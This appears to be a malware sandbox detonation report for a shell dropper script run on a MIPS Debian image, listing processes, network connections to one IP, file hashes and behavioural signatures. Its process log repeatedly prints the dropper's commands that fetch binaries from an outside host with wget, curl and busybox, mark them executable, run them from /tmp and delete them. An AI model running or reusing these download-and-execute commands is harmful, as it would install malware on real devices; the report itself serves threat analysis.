[curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/bin/chmod

[chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi

[./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/bin/rm

[rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/usr/bin/wget

[wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/bin/chmod

[chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed

[./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/bin/rm

[rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/usr/bin/wget

[wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/bin/chmod

[chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE

[./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/bin/rm

[rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/usr/bin/wget

[wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/bin/chmod

[chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ

[./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/bin/rm

[rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/bin/chmod

[chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak

[./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/bin/rm

[rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/usr/bin/wget

[wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/bin/chmod

[chmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ

[./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/bin/rm

[rm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/bin/chmod

[chmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F

[./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/bin/rm

[rm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]

/usr/bin/wget

[wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/bin/chmod

[chmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L

[./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/bin/rm

[rm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]

/usr/bin/wget

[wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/bin/chmod

[chmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG

[./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/bin/rm

[rm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]

/usr/bin/wget

[wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/bin/chmod

[chmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt

[./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/bin/rm

[rm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]

/usr/bin/wget

[wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/bin/chmod

[chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS

[./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/bin/rm

[rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]

/usr/bin/wget

[wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/bin/chmod

[chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd

[./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/bin/rm

[rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]

/usr/bin/wget

[wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/bin/chmod

[chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS

[./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/bin/rm

[rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]

/usr/bin/wget

[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/bin/chmod

[chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I

[./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/bin/rm

[rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/usr/bin/wget

[wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/bin/chmod

[chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed

[./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/bin/rm

[rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]

/usr/bin/wget

[wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/bin/chmod

[chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE

[./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/bin/rm

[rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]

/usr/bin/wget

[wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/bin/chmod

[chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ

[./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/bin/rm

[rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/bin/chmod

[chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi

[./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/bin/rm

[rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]

/usr/bin/wget

[wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/bin/chmod

[chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak

[./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/bin/rm

[rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]

/usr/bin/wget

[wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-14 02:38

Reported

2024-11-14 02:41

Platform

debian9-mipsel-20240611-en

Max time kernel

149s

Max time network

151s

Command Line

[/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I N/A
N/A /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS N/A
N/A /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd N/A
N/A /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS N/A
N/A /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi N/A
N/A /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed N/A
N/A /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE N/A
N/A /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ N/A
N/A /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak N/A
N/A /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ N/A
N/A /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F N/A
N/A /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L N/A
N/A /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG N/A
N/A /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt N/A
N/A /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS N/A
N/A /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd N/A
N/A /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS N/A
N/A /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I N/A
N/A /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed N/A
N/A /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE N/A
N/A /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ N/A
N/A /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi N/A
N/A /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak N/A
N/A /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ N/A
N/A /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F N/A
N/A /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L N/A
N/A /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG N/A
N/A /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /usr/bin/curl N/A
File opened for modification /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /usr/bin/curl N/A
File opened for modification /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /usr/bin/curl N/A
File opened for modification /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /usr/bin/curl N/A
File opened for modification /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt /usr/bin/curl N/A
File opened for modification /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /usr/bin/curl N/A
File opened for modification /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /usr/bin/curl N/A
File opened for modification /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /usr/bin/curl N/A
File opened for modification /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /usr/bin/curl N/A
File opened for modification /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt /usr/bin/curl N/A
File opened for modification /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /usr/bin/curl N/A
File opened for modification /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /usr/bin/curl N/A
File opened for modification /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /usr/bin/curl N/A
File opened for modification /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /usr/bin/curl N/A
File opened for modification /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /usr/bin/curl N/A
File opened for modification /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /usr/bin/curl N/A
File opened for modification /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /usr/bin/curl N/A
File opened for modification /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /usr/bin/curl N/A
File opened for modification /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /usr/bin/curl N/A
File opened for modification /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /usr/bin/curl N/A
File opened for modification /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /usr/bin/curl N/A
File opened for modification /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /usr/bin/curl N/A
File opened for modification /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /usr/bin/curl N/A
File opened for modification /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /usr/bin/curl N/A
File opened for modification /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /usr/bin/curl N/A
File opened for modification /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /usr/bin/curl N/A
File opened for modification /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /usr/bin/curl N/A
File opened for modification /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /usr/bin/curl N/A

Processes

/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh

[/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]

/bin/busybox

